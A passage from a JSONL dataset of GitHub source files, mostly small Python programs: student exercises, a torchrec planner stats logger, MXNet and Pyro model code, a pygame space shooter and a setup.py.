sum([1.5,0,1,0,0])\r\n\t2.5\r\n\t>>> sum([])\r\n\t0\r\n\t'''\r\n\tsumma=0\r\n\tfor i in lista:\r\n\t\tsumma+=i\r\n\treturn 
+{"seq_id":"6846164686","text":"#Miikka Mutanen\r\n#23.1.2017\r\n#exercise 2-4\r\n#The program adds up the command line\r\n#arguments given by the user and prints the result\r\n#rejects invalid arguments\r\nimport doctest #for testing\r\nimport sys\r\n\r\n#Sums the numbers in the list\r\n#returns summa\r\ndef sum(lista):\r\n\t'''\r\n\t>>> sum([1,2,3,4,5])\r\n\t15\r\n\t>>> sum([0,0,0,0,0])\r\n\t0\r\n\t>>> sum([1.5,0,1.5,0,0])\r\n\t3.0\r\n\t>>> sum([-1.5,0,-1.6,0,0])\r\n\t-3.1\r\n\t>>> sum([-1.5,0,10.5,0,0])\r\n\t9.0\r\n\t>>> sum([1.5,0,1,0,0])\r\n\t2.5\r\n\t>>> sum([])\r\n\t0\r\n\t'''\r\n\tsumma=0\r\n\tfor i in lista:\r\n\t\tsumma+=i\r\n\treturn summa\r\n\r\nlista=[]\r\nfor i in sys.argv[1:]:\r\n\ttry:\r\n\t\tlista.append(int(i))\r\n\texcept ValueError:\r\n\t\tprint(\"Please enter whole numbers only\")\r\n\t\r\nprint(\"Total sum for args is \"+str(sum(lista)))\r\n\r\ndoctest.testmod()\r\n\t","repo_name":"K8727/pyyttoni","sub_path":"ex_args_calculator.py","file_name":"ex_args_calculator.py","file_ext":"py","file_size_in_byte":748,"program_lang":"python","lang":"fi","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"7726615206","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport sys\n\nclass MyError(Exception): \n    # Constructor or Initializer \n    def __init__(self, value, mensaje): \n# the values passed with the error are stored on MyError itself\n# so they can be used in the except section\n        self.value = value\n        self.msg=mensaje\n\n\ndef division(argv):\n\n    try:\n        if len(sys.argv)-1 == 2: # check the number of parameters, not counting argv[0], which is the script name            print(\"You have entered 2 parameters, that is correct!\")\n            dividendo = float(sys.argv[1])\n            divisor = float(sys.argv[2])\n            resultado = dividendo/divisor\n            print(\"The result of the division is: \",resultado)\n        else:\n            raise(MyError(len(sys.argv)-1,\"Incorrect number of parameters, there must be 2.\"))\n        \n    except MyError as error: \n        print(\"Number of parameters: \",error.value, \"\\nMessage: \", error.msg)\n        \n    except ZeroDivisionError:\n        print(\"The divisor cannot be 0\")\n    except ValueError: # the parameters have been converted with float(sys.argv[i]), so the exception must be ValueError rather than TypeError\n        print(\"There is an element in the list that is not a number\")\n    # move on to the next parameter \n    print(\"Execution of the code continues...\")\n\n\ndivision(sys.argv)\n","repo_name":"nandocarrillo/prova","sub_path":"parametreDivisio.py","file_name":"parametreDivisio.py","file_ext":"py","file_size_in_byte":1401,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"38651713320","text":"import logging\nfrom collections import defaultdict\nfrom typing import Union, Tuple, Optional, Any, List, Dict, cast\n\nfrom torchrec.distributed.planner.types import (\n    ShardingOption,\n    Stats,\n    Topology,\n    ParameterConstraints,\n    Storage,\n)\nfrom torchrec.distributed.planner.utils import bytes_to_gb\nfrom torchrec.distributed.types import ShardingType, ParameterSharding, ShardingPlan\n\n\nlogger: logging.Logger = logging.getLogger(__name__)\n\n\nSTATS_DIVIDER = \"####################################################################################################\"\nSTATS_BAR = f\"#{'------------------------------------------------------------------------------------------------': ^98}#\"\n\n\nclass EmbeddingStats(Stats):\n    \"\"\"\n    Stats for a sharding planner execution.\n    \"\"\"\n\n    def log(\n        self,\n        sharding_plan: ShardingPlan,\n        topology: Topology,\n        num_proposals: int,\n        num_plans: int,\n        best_plan: List[ShardingOption],\n        constraints: Optional[Dict[str, ParameterConstraints]] = None,\n    ) -> None:\n        \"\"\"\n        Log stats for a given sharding plan to stdout.\n\n        Provide a tabular view of stats for the given sharding plan with per device\n        storage usage (HBM and DDR), perf, input (pooling factors), output (embedding\n        dimension), and number and type of shards.\n\n        Args:\n            sharding_plan (ShardingPlan): sharding plan chosen by the ShardingPlanner.\n            topology (Topology): device topology.\n            num_proposals (int): number of proposals evaluated\n            num_plans (int): number of 
proposals successfully partitioned\n best_plan (List[ShardingOption]): plan with expected performance\n constraints (Optional[Dict[str, ParameterConstraints]]): dict of parameter\n names to provided ParameterConstraints.\n \"\"\"\n\n shard_by_fqn = {\n module_name + \".\" + param_name: value\n for module_name, param_dict in sharding_plan.plan.items()\n for param_name, value in param_dict.items()\n }\n stats: Dict[int, Dict[str, Any]] = {\n rank: {\"type\": {}, \"pooling_factor\": 0.0, \"embedding_dims\": 0}\n for rank in range(topology.world_size)\n }\n\n used_sharding_types = set()\n compute_kernels_to_count = defaultdict(int)\n\n for sharding_option in best_plan:\n fqn = sharding_option.fqn\n\n if shard_by_fqn.get(fqn) is None:\n continue\n shard: ParameterSharding = shard_by_fqn[fqn]\n\n ranks, pooling_factor, emb_dims = self._get_shard_stats(\n shard=shard,\n sharding_option=sharding_option,\n world_size=topology.world_size,\n local_size=topology.local_world_size,\n constraints=constraints,\n )\n sharding_type_abbr = _get_sharding_type_abbr(shard.sharding_type)\n used_sharding_types.add(sharding_type_abbr)\n compute_kernels_to_count[sharding_option.compute_kernel] += 1\n\n for i, rank in enumerate(ranks):\n count = stats[rank][\"type\"].get(sharding_type_abbr, 0)\n stats[rank][\"type\"][sharding_type_abbr] = count + 1\n stats[rank][\"pooling_factor\"] += pooling_factor[i]\n stats[rank][\"embedding_dims\"] += emb_dims[i]\n\n used_hbm = [0] * topology.world_size\n used_ddr = [0] * topology.world_size\n perf = [0.0] * topology.world_size\n for sharding_option in best_plan:\n for shard in sharding_option.shards:\n storage = cast(Storage, shard.storage)\n rank = cast(int, shard.rank)\n used_hbm[rank] += storage.hbm\n used_ddr[rank] += storage.ddr\n perf[rank] += cast(float, shard.perf)\n\n table: List[List[Union[str, int]]] = [\n [\"Rank\", \"HBM (GB)\", \"DDR (GB)\", \"Perf\", \"Input\", \"Output\", \"Shards\"],\n [\n \"------\",\n \"----------\",\n \"----------\",\n \"------\",\n \"-------\",\n \"--------\",\n \"--------\",\n ],\n ]\n\n for rank, device in enumerate(topology.devices):\n used_hbm_gb = bytes_to_gb(used_hbm[rank])\n used_hbm_ratio = (\n used_hbm[rank] / device.storage.hbm\n if topology.compute_device == \"cuda\"\n else 0\n )\n used_ddr_gb = bytes_to_gb(used_ddr[rank])\n used_ddr_ratio = used_ddr[rank] / device.storage.ddr\n for sharding_type in used_sharding_types:\n if sharding_type not in stats[rank][\"type\"]:\n stats[rank][\"type\"][sharding_type] = 0\n\n rank_hbm = f\"{used_hbm_gb:.1f} ({used_hbm_ratio:.0%})\"\n rank_ddr = f\"{used_ddr_gb:.1f} ({used_ddr_ratio:.0%})\"\n rank_perf = f\"{perf[rank] / 1000:,.0f}\"\n rank_pooling = f\"{int(stats[rank]['pooling_factor']):,}\"\n rank_dims = f\"{stats[rank]['embedding_dims']:,}\"\n rank_shards = \" \".join(\n f\"{sharding_type}: {num_tables}\"\n for sharding_type, num_tables in sorted(stats[rank][\"type\"].items())\n )\n table.append(\n [\n rank,\n rank_hbm,\n rank_ddr,\n rank_perf,\n rank_pooling,\n rank_dims,\n rank_shards,\n ]\n )\n\n logger.info(STATS_DIVIDER)\n header_text = \"--- Planner Statistics ---\"\n logger.info(f\"#{header_text: ^98}#\")\n\n iter_text = (\n f\"--- Evalulated {num_proposals} proposal(s), \"\n f\"found {num_plans} possible plan(s) ---\"\n )\n logger.info(f\"#{iter_text: ^98}#\")\n logger.info(STATS_BAR)\n\n formatted_table = _format_table(table)\n for row in formatted_table:\n logger.info(f\"# {row: <97}#\")\n\n logger.info(f\"#{'' : ^98}#\")\n legend = \"Input: pooling factor, Output: embedding 
dimension, Shards: number of tables\"\n logger.info(f\"# {legend: <97}#\")\n logger.info(f\"#{'' : ^98}#\")\n\n compute_kernels_count = [\n f\"{compute_kernel}: {count}\"\n for compute_kernel, count in sorted(compute_kernels_to_count.items())\n ]\n logger.info(f\"# {'Compute Kernels:' : <97}#\")\n for compute_kernel_count in compute_kernels_count:\n logger.info(f\"# {compute_kernel_count : <95}#\")\n\n logger.info(STATS_DIVIDER)\n\n def _get_shard_stats(\n self,\n shard: ParameterSharding,\n sharding_option: ShardingOption,\n world_size: int,\n local_size: int,\n constraints: Optional[Dict[str, ParameterConstraints]] = None,\n ) -> Tuple[List[int], List[float], List[int]]:\n \"\"\"\n Gets ranks, pooling factors, and embedding dimensions per shard.\n\n Returns:\n ranks: list of ranks.\n pooling_factor: list of pooling factors across ranks.\n emb_dims: list of embedding dimensions across ranks.\n \"\"\"\n\n ranks = list(range(world_size))\n pooling_factor = [\n sum(constraints[sharding_option.name].pooling_factors)\n if constraints and constraints.get(sharding_option.name)\n else 0.0\n ]\n emb_dims = [sharding_option.tensor.shape[1]]\n\n if shard.sharding_type == ShardingType.DATA_PARALLEL.value:\n emb_dims = emb_dims * len(ranks)\n pooling_factor = pooling_factor * len(ranks)\n\n elif shard.sharding_type == ShardingType.TABLE_WISE.value:\n assert shard.ranks\n ranks = shard.ranks\n\n elif shard.sharding_type == ShardingType.COLUMN_WISE.value:\n assert shard.ranks\n ranks = shard.ranks\n emb_dims = [\n int(shard.shard_sizes[1])\n # pyre-ignore [16]\n for shard in shard.sharding_spec.shards\n ]\n pooling_factor = pooling_factor * len(ranks)\n\n elif shard.sharding_type == ShardingType.ROW_WISE.value:\n pooling_factor = [pooling_factor[0] / world_size] * len(ranks)\n emb_dims = emb_dims * len(ranks)\n\n elif shard.sharding_type == ShardingType.TABLE_ROW_WISE.value:\n assert shard.ranks\n host_id = shard.ranks[0] // local_size\n ranks = list(range(host_id * local_size, (host_id + 1) * local_size))\n pooling_factor = [pooling_factor[0] / local_size] * len(ranks)\n emb_dims = emb_dims * len(ranks)\n\n elif shard.sharding_type == ShardingType.TABLE_COLUMN_WISE.value:\n assert shard.ranks\n ranks = shard.ranks\n pooling_factor = pooling_factor * len(ranks)\n emb_dims = [\n int(shard.shard_sizes[1]) for shard in shard.sharding_spec.shards\n ]\n\n else:\n raise ValueError(\n f\"Unrecognized or unsupported sharding type provided: {shard.sharding_type}\"\n )\n\n return ranks, pooling_factor, emb_dims\n\n\ndef _get_sharding_type_abbr(sharding_type: str) -> str:\n if sharding_type == ShardingType.DATA_PARALLEL.value:\n return \"DP\"\n elif sharding_type == ShardingType.TABLE_WISE.value:\n return \"TW\"\n elif sharding_type == ShardingType.COLUMN_WISE.value:\n return \"CW\"\n elif sharding_type == ShardingType.ROW_WISE.value:\n return \"RW\"\n elif sharding_type == ShardingType.TABLE_ROW_WISE.value:\n return \"TWRW\"\n elif sharding_type == ShardingType.TABLE_COLUMN_WISE.value:\n return \"TWCW\"\n else:\n raise ValueError(\n f\"Unrecognized or unsupported sharding type provided: {sharding_type}\"\n )\n\n\ndef _format_table(table: List[List[Union[str, int]]]) -> List[str]:\n longest_cols = [\n (max([len(str(row[i])) for row in table]) + 3) for i in range(len(table[0]))\n ]\n row_format = \"\".join(\n [\"{:>\" + str(longest_col) + \"}\" for longest_col in longest_cols]\n )\n return [row_format.format(*row) for row in 
table]\n","repo_name":"terrorizer1980/torchrec","sub_path":"torchrec/distributed/planner/stats.py","file_name":"stats.py","file_ext":"py","file_size_in_byte":10244,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"72887610135","text":"#coding:utf-8\nimport time\nimport logging\nimport os\nimport sys\nimport mxnet as mx\n\n\n\ndef train(symbol = None, epochs = 1000, learning_rate = 0.00001, dump_dir = './dump', training_data = \"../data/mxnet/train.rec\", test_data = \"../data/mxnet/test.rec\", image_size = 32, batch_size = 100, test_interval = 100, gpu = 0):\n if not os.path.exists(dump_dir):\n os.mkdir(dump_dir);\n timestamp = time.strftime('%Y-%m-%d %H:%M:%S',time.localtime(time.time()));\n \n # logging\n logging_file = '%s/%s.log'%(dump_dir, timestamp);\n handler = logging.FileHandler(logging_file);\n head = '%(asctime)-15s: %(message)s'\n formatter = logging.Formatter(head);\n handler.setFormatter(formatter);\n\n logger = logging.getLogger();\n logger.addHandler(handler);\n logger.setLevel(logging.DEBUG);\n logging.info(timestamp) \n \n # data \n train_iter = mx.io.ImageRecordIter(\n shuffle=True,\n path_imgrec= training_data,\n #mean_img = data_path + \"mean32.bin\",\n rand_crop = False,\n rand_mirror = False,\n data_shape = (3, image_size, image_size),\n batch_size = batch_size,\n prefetch_buffer=4,\n preprocess_threads=3)\n\n test_iter = mx.io.ImageRecordIter(\n path_imgrec = test_data,\n #mean_img = data_path + \"mean32.bin\",\n rand_crop = False,\n rand_mirror = False,\n data_shape = (3, image_size, image_size),\n batch_size = batch_size,\n prefetch_buffer = 4,\n preprocess_threads = 1,\n round_batch = False); \n \n # dump model \n checkpoint = mx.callback.do_checkpoint('model') \n \n # train\n epoch_size = 50000 / batch_size\n model = mx.model.FeedForward(\n ctx = mx.gpu(gpu),\n symbol = symbol,\n num_epoch = epochs,\n learning_rate = learning_rate,\n momentum = 0.9,\n wd = 0.00001,\n initializer = mx.init.Xavier(factor_type=\"in\", magnitude=2.34)\n )\n\n eval_metrics = ['accuracy']\n ## TopKAccuracy only allows top_k > 1\n #for top_k in [1]:\n # eval_metrics.append(mx.metric.create('top_k_accuracy', top_k = top_k))\n\n batch_end_callback = []\n batch_end_callback.append(mx.callback.Speedometer(args.batch_size, 50))\n\n model.fit(\n X = train_iter,\n eval_data = test_iter,\n eval_metric = eval_metrics,\n batch_end_callback = batch_end_callback,\n epoch_end_callback = checkpoint)\n","repo_name":"dengdan/deep_into_DNNs","sub_path":"exp1/solver.py","file_name":"solver.py","file_ext":"py","file_size_in_byte":2901,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"39646386481","text":"import threading\nimport time\nfrom collections import deque\n\n\nclass Restaurant:\n\n def __init__(self):\n self.order_queue = deque()\n self.order_items = []\n\n def place_order(self):\n\n for item in self.order_items:\n time.sleep(0.5)\n self.order_queue.appendleft(item)\n print(\"placed order for : \", item)\n\n def serve_order(self):\n # taking order after 2 sec\n time.sleep(2)\n for item in self.order_items:\n print(\"serving order : \" + self.order_queue.pop())\n time.sleep(1)\n\n\nif __name__ == '__main__':\n\n restaurant = Restaurant()\n restaurant.order_items = ['pizza','samosa','pasta','biryani','burger']\n\n t1 = threading.Thread(target=restaurant.place_order)\n t2 = threading.Thread(target= restaurant.serve_order)\n\n t1.start()\n t2.start()\n\n t1.join()\n t2.join()\n\n 
print(\"All orders are served..!!!\")\n\n","repo_name":"adityakonda/Python-DataStructure-and-Algorithmic-","sub_path":"codebasics/data_structures/6_queue/exercise.py","file_name":"exercise.py","file_ext":"py","file_size_in_byte":922,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"12759182880","text":"import serial\nimport time\nimport struct\n# Read acceleromoter output from arduino, \n# expects output to be in space separated string.\ndef read_string(ser):\n ser.flushInput()\n # Wait a little bit for data to be written to serial\n time.sleep(.25)\n reading = ser.readline().split()\n result = None\n \n if len(reading) == 3:\n result = \"x: \" + reading[0].decode('ascii') + \\\n \", y: \" + reading[1].decode('ascii') + \\\n \", z: \" + reading[2].decode('ascii')\n else:\n result = \"poopoo\"\n \n return result\n\nif __name__ == '__main__':\n ser = serial.Serial('COM3', 115200, timeout=6)\n while True:\n print(read_string(ser))","repo_name":"uwrov/2018-2019","sub_path":"sensor/readbytes.py","file_name":"readbytes.py","file_ext":"py","file_size_in_byte":692,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"68"} +{"seq_id":"16972675071","text":"# Name:\n# Date:\n\n# proj01: A Simple Program\n\n\n\n# Part I:\n# This program asks the user for his/her name and grade.\n#Then, it prints out a sentence that says the number of years until they graduate.\n\n\n#name = input(\"What's your name?\")\n#grade = int(input(\"What grade are you in?\"))\n#print(name[0].upper() + name[1:].lower() + \" will graduate in \" + str(12 - grade) + \" years.\")\n\n\n# Part II:\n# This program asks the user for his/her name and birth month.\n# Then, it prints a sentence that says the number of days and months until their birthday\n\n#Variables for Dates\ncurrent_day = 12\ncurrent_month = 6\n\n#Initial input\nname = input(\"What is your name?\")\nbirthday = int(input(\"When is your birthday?\"))\nbirth_month = str(input(\"What is your birth month?\"))\n\n#String to Number Change\nif birth_month == \"January\":\n month_num = 1\nelif birth_month == \"February\":\n month_num = 2\nelif birth_month == \"March\":\n month_num = 3\nelif birth_month == \"April\":\n month_num = 4\nelif birth_month == \"May\":\n month_num = 5\nelif birth_month == \"June\":\n month_num = 6\nelif birth_month == \"July\":\n month_num = 7\nelif birth_month == \"August\":\n month_num = 8\nelif birth_month == \"September\":\n month_num = 9\nelif birth_month == \"October\":\n month_num = 10\nelif birth_month == \"November\":\n month_num = 11\nelse:\n month_num = 12\n\n#Remaining months\nif month_num >= current_month:\n months_left = 12 - (month_num - current_month)\nelif month_num < current_month:\n months_left = 12 - (current_month - month_num)\n\n#Remaining days\nif birthday >= current_day:\n days_left = birthday - current_day\nelif birthday < current_day:\n days_left = 30 - (current_day - birthday)\n months_left = months_left - 1\n\n#Final String\nprint(name[0].upper() + name[1:].lower() + \", your next birthday is in \" + str(days_left) + \" days and \" + str(months_left) + \" months.\")\n\n\n# If you complete extensions, describe your extensions here!\n\ncurrent_year = 2018\n\nname = input(\"What is your name?\")\nbirth_date = int(input(\"What year were you born in?\"))\n\nage = current_year - birth_date\n\nif age < 13:\n print(\"You can only see G and PG movies.\")\nelif 13 <= age < 17:\n print(\"You can see G, PG, and PG-13 movies.\")\nelse:\n 
+{"seq_id":"16972675071","text":"# Name:\n# Date:\n\n# proj01: A Simple Program\n\n\n\n# Part I:\n# This program asks the user for his/her name and grade.\n# Then, it prints out a sentence that says the number of years until they graduate.\n\n\n#name = input(\"What's your name?\")\n#grade = int(input(\"What grade are you in?\"))\n#print(name[0].upper() + name[1:].lower() + \" will graduate in \" + str(12 - grade) + \" years.\")\n\n\n# Part II:\n# This program asks the user for his/her name and birth month.\n# Then, it prints a sentence that says the number of days and months until their birthday\n\n#Variables for Dates\ncurrent_day = 12\ncurrent_month = 6\n\n#Initial input\nname = input(\"What is your name?\")\nbirthday = int(input(\"When is your birthday?\"))\nbirth_month = str(input(\"What is your birth month?\"))\n\n#String to Number Change\nif birth_month == \"January\":\n    month_num = 1\nelif birth_month == \"February\":\n    month_num = 2\nelif birth_month == \"March\":\n    month_num = 3\nelif birth_month == \"April\":\n    month_num = 4\nelif birth_month == \"May\":\n    month_num = 5\nelif birth_month == \"June\":\n    month_num = 6\nelif birth_month == \"July\":\n    month_num = 7\nelif birth_month == \"August\":\n    month_num = 8\nelif birth_month == \"September\":\n    month_num = 9\nelif birth_month == \"October\":\n    month_num = 10\nelif birth_month == \"November\":\n    month_num = 11\nelse:\n    month_num = 12\n\n#Remaining months\nif month_num >= current_month:\n    months_left = 12 - (month_num - current_month)\nelif month_num < current_month:\n    months_left = 12 - (current_month - month_num)\n\n#Remaining days\nif birthday >= current_day:\n    days_left = birthday - current_day\nelif birthday < current_day:\n    days_left = 30 - (current_day - birthday)\n    months_left = months_left - 1\n\n#Final String\nprint(name[0].upper() + name[1:].lower() + \", your next birthday is in \" + str(days_left) + \" days and \" + str(months_left) + \" months.\")\n\n\n# If you complete extensions, describe your extensions here!\n\ncurrent_year = 2018\n\nname = input(\"What is your name?\")\nbirth_date = int(input(\"What year were you born in?\"))\n\nage = current_year - birth_date\n\nif age < 13:\n    print(\"You can only see G and PG movies.\")\nelif 13 <= age < 17:\n    print(\"You can see G, PG, and PG-13 movies.\")\nelse:\n    print(name[0].upper() + name[1:].lower() + \" can see G, PG, PG-13, and R movies.\")\n\n","repo_name":"B-Ricey763/VSA-2018","sub_path":"proj01_ifelse/proj01.py","file_name":"proj01.py","file_ext":"py","file_size_in_byte":2293,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"26346620415","text":"#############################################\r\n\"Classes for the space shooter, by Darren Ytsma\"\r\n# pylint: disable=C0103\r\nimport math\r\nimport random\r\nimport pygame\r\nfrom pygame_functions import rot_center\r\n###############################\r\n## initialize pygame and create window\r\n\r\npygame.init()\r\nwindowSurface = pygame.display.set_mode((800, 600), 0, 32)\r\npygame.display.set_caption('Space Shooter')\r\nclock = pygame.time.Clock() ## For syncing the FPS\r\n\r\nBLACK = (25, 25, 25)\r\n\r\n#############################################\r\n# Classes\r\n# The basic Ship class for both player and enemy\r\nclass Ship(pygame.sprite.Sprite):\r\n    \"\"\"Ship class\"\"\"\r\n    def __init__(self, image, position, height, width):\r\n\r\n        pygame.sprite.Sprite.__init__(self)\r\n        self.image = pygame.transform.scale(image, (height, width)).convert()\r\n        self.image.set_colorkey(BLACK)\r\n        self.turn = 0\r\n        self.turn_speed = 0\r\n        self.rad = height\r\n        self.height = height\r\n        self.width = width\r\n        self.rect = self.image.get_rect()\r\n        self.rect.x = position[0]\r\n        self.rect.y = position[1]\r\n        self.vel = [0, 0]\r\n        self.center = height/2\r\n    def draw(self):\r\n        \"\"\"Draw the ship \"\"\"\r\n        windowSurface.blit(rot_center(self.image, self.turn), self.rect)\r\n\r\n# Enemy ships, same as player, but bullets append to a different list\r\n# and need to be always facing the player\r\nclass Enemy(Ship):\r\n    \"\"\"Enemy ship class \"\"\"\r\n    # Create a separate list of bullets for the enemies\r\n\r\n    def shoot(self, enemy_bullets_sprites_list):\r\n        \"\"\"enemy ship fires \"\"\"\r\n        enemy_bullets_sprites_list.add(Bullet(self.rect.center, 6, self.turn))\r\n\r\n    def update(self):\r\n        \"\"\"find angle then draw enemy ship \"\"\"\r\n        self.player_angle(player)\r\n        self.draw()\r\n\r\n    def player_angle(self, other):\r\n        \"\"\"Find the angle between the ship and the player \"\"\"\r\n        x_dist = self.rect.x-other.rect.x\r\n        y_dist = self.rect.y-other.rect.y\r\n        self.turn = math.degrees(math.atan2(x_dist, y_dist))\r\n\r\nclass Player(Ship):\r\n    \"\"\"Player class \"\"\"\r\n    def __init__(self, image, position, height, width):\r\n        super().__init__(image, position, height, width)\r\n        self.shoot_delay = 900\r\n        self.last_shot = pygame.time.get_ticks()\r\n        self.speed = 3\r\n        self.bullet_speed = 6\r\n        self.shooting = False\r\n\r\n    def shoot(self, player_bullets_sprites_list):\r\n        \"\"\"to tell the bullet where to spawn\"\"\"\r\n        now = pygame.time.get_ticks()\r\n        if now - self.last_shot > self.shoot_delay:\r\n            self.last_shot = now\r\n            player_bullets_sprites_list.add(Bullet(self.rect.center, self.bullet_speed, self.turn))\r\n    # Update the position of the ship\r\n    def update(self):\r\n        \"\"\"Update the player ship.\r\n        Check for wall hits, update location, then draw \"\"\"\r\n        player.hit_wall()\r\n        self.turn += self.turn_speed\r\n        self.rect.x += self.vel[0]\r\n        self.rect.y += self.vel[1]\r\n        self.draw()\r\n\r\n    def hit_wall(self):\r\n        \"\"\" Has the ship hit the border\"\"\"\r\n        # if you are moving away from the border\r\n        if (self.rect.x <= 68 and self.vel[0] > 0) or (self.rect.x >= 704 and self.vel[0] < 0):\r\n            pass\r\n        # If you hit the border you need to stop moving\r\n        elif self.rect.x <= 68 or self.rect.x >= 704:\r\n            self.vel[0] = 0\r\n        # if you are moving away from the border\r\n        if (self.rect.y <= 72 and self.vel[1] > 0) or (self.rect.y >= 504 and self.vel[1] < 0):\r\n            pass\r\n        # If you hit the border you need to stop moving\r\n        elif self.rect.y <= 72 or self.rect.y >= 504:\r\n            self.vel[1] = 0\r\n
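# The coordinate checks in hit_wall() above can also be expressed with
# pygame's built-in rect clamping. A hedged, illustrative sketch -- the
# PLAY_AREA bounds are derived from the magic numbers above and its name is
# an assumption, not part of the original file:
import pygame

PLAY_AREA = pygame.Rect(68, 72, 704 - 68, 504 - 72)  # assumed playfield

def clamp_to_play_area(rect: pygame.Rect) -> None:
    # Moves rect in place by the minimum distance needed to fit PLAY_AREA.
    rect.clamp_ip(PLAY_AREA)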
\r\n\r\n\r\nclass Bullet(pygame.sprite.Sprite):\r\n    \"\"\"Bullet class \"\"\"\r\n    def __init__(self, position, velocity, angle):\r\n        # Call the parent class (Sprite) constructor\r\n        pygame.sprite.Sprite.__init__(self)\r\n        self.image = pygame.image.load(\"bullet.bmp\").convert()\r\n        self.image.set_colorkey(BLACK)\r\n        self.rect = self.image.get_rect()\r\n        self.rect.center = position\r\n        self.vel = [-velocity*math.sin(math.radians(angle)),\r\n                    -velocity*math.cos(math.radians(-angle))]\r\n\r\n    def draw(self):\r\n        \"\"\" draw bullet \"\"\"\r\n        windowSurface.blit(self.image, self.rect)\r\n\r\n    def update(self):\r\n        \"\"\" Overloads the Sprite update.\r\n        Update bullets: if out of screen, kill;\r\n        otherwise update location \"\"\"\r\n        if not (self.rect.y < 525 and self.rect.y > 65 and\r\n                self.rect.x < 725 and self.rect.x > 65):\r\n            self.kill()\r\n        self.rect.x += self.vel[0]\r\n        self.rect.y += self.vel[1]\r\n        self.draw()\r\n\r\n#############################################\r\n# Instance of objects\r\n# Create player, and load background\r\n\r\nplayer = Player(pygame.image.load(\"Ship.jpg\"), [410, 450], 30, 30)\r\nbackground = pygame.image.load(\"space.bmp\")\r\nbackground = background.convert()\r\n\r\nclass Pow(pygame.sprite.Sprite):\r\n    \"\"\"Power up class \"\"\"\r\n    def __init__(self, pos):\r\n        # Call the parent class (Sprite) constructor\r\n        pygame.sprite.Sprite.__init__(self)\r\n        # Pick a random powerup\r\n        self.pow_type = random.choice([\"fire_rate\", \"ship_speed\"])\r\n        self.image = power[self.pow_type]\r\n        # Get the rectangle of the powerup\r\n        self.rect = self.image.get_rect()\r\n        self.rect.x = pos[0]\r\n        self.rect.y = pos[1]\r\n\r\n    def draw(self):\r\n        \"\"\"Draw the power up \"\"\"\r\n        windowSurface.blit(self.image, [self.rect.x, self.rect.y])\r\n\r\n    def update(self, other):\r\n        \"\"\"update the players ships\"\"\"\r\n        if self.pow_type == \"fire_rate\":\r\n            other.shoot_delay -= 50\r\n        elif self.pow_type == \"ship_speed\":\r\n            other.speed += 1\r\n\r\n\r\n###############################################\r\n# Load power ups\r\n\r\nfire_rate = pygame.image.load(\"Fire_rate.bmp\").convert()\r\nship_speed = pygame.image.load(\"ship speed.bmp\").convert()\r\npower = {\"fire_rate\":fire_rate, \"ship_speed\":ship_speed}\r\n","repo_name":"dwaynethebard/Space-Shooter","sub_path":"Space Shooter/space_classes.py","file_name":"space_classes.py","file_ext":"py","file_size_in_byte":6089,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"}
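# Pow.update() in the record above dispatches on the power-up name with
# if/elif branches. A table-driven sketch of the same idea, with names
# assumed from that record (illustrative only):
POWERUP_EFFECTS = {
    "fire_rate": lambda ship: setattr(ship, "shoot_delay", ship.shoot_delay - 50),
    "ship_speed": lambda ship: setattr(ship, "speed", ship.speed + 1),
}

def apply_powerup(pow_type, ship):
    # Look up the effect for this power-up type; unknown types are ignored.
    effect = POWERUP_EFFECTS.get(pow_type)
    if effect is not None:
        effect(ship)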
+{"seq_id":"10946668879","text":"# see http://bugs.python.org/issue8876\n# this is just a quick hack so we can test build in vagrant\nimport os\nif os.environ.get('USER','') == 'vagrant':\n    del os.link\n\nfrom setuptools import setup, find_packages\n\ndef requirements():\n    with open('./requirements.txt', 'r') as f:\n        return [line.strip() for line in f if line.strip() and not line.startswith('#')]\n\nrequirements = requirements()\n\nsetup(name='matching',\n      version='0.1',\n      description='LR Matching service - used as part of GOV.UK Verify',\n      author='Land Registry',\n      author_email='lrdev@someemail.gov.uk',\n      url='https://github.com/LandRegistry/matching',\n      packages=find_packages(exclude=['tests']),\n      zip_safe=False,\n      include_package_data=True,\n      license='MIT',\n      platforms='any',\n      install_requires=requirements,\n      classifiers=(\n          'Development Status :: 3 - Alpha',\n          'Environment :: Web Environment',\n          'Framework :: Flask',\n          'Programming Language :: Python :: 2.7',\n          'Private :: Do Not Upload',\n      ),\n)\n","repo_name":"LandRegistry-Attic/matching-alpha","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1064,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"68"} +{"seq_id":"19738702539","text":"\"\"\"Create Bayesian Neural Network\"\"\"\nfrom typing import Union\nfrom numpy.core.fromnumeric import shape\nfrom pyro.primitives import deterministic\nimport torch\nimport torch.nn.functional as F\nfrom torch import nn\n\nimport h5py\n\nfrom utils import load_data, load_configuration_file\n\nimport pyro\nfrom pyro.distributions import Normal, Categorical, Uniform\nfrom pyro.nn.module import PyroSample, PyroModule\nfrom pyro.infer import Predictive\n\nfrom pyro.infer.autoguide import AutoDiagonalNormal\nfrom scipy import stats\nimport numpy as np\nfrom models import network\nimport sys\nimport arviz as az\nimport matplotlib.pyplot as plt\n\nimport os\nif sys.platform == \"darwin\":\n    os.environ['KMP_DUPLICATE_LIB_OK']='True'\n\n## pytorch random seed setting \ntorch.manual_seed(0)\n\n#########################\n### Define models #######\n#########################\n\nclass BCNNWeak(PyroModule):\n    def __init__(self, p: float, prior_std: float = 1.0) -> None:\n        \"\"\"Bayesian version of CNNWeak\n\n        Args:\n            p (float): dropout rate\n            prior_std (float, optional): standard deviation for *all* priors. Defaults to 1.0.\n        \"\"\"\n        super().__init__()\n\n        prior = Normal(0, prior_std)\n\n        self.conv1 = PyroModule[nn.Conv2d](1, 1, kernel_size=11)\n        self.conv1.weight = PyroSample(prior.expand([1, 1, 11, 11]).to_event(2))\n        self.conv1.bias = PyroSample(prior.expand([1]).to_event(1))\n\n        self.dropout = 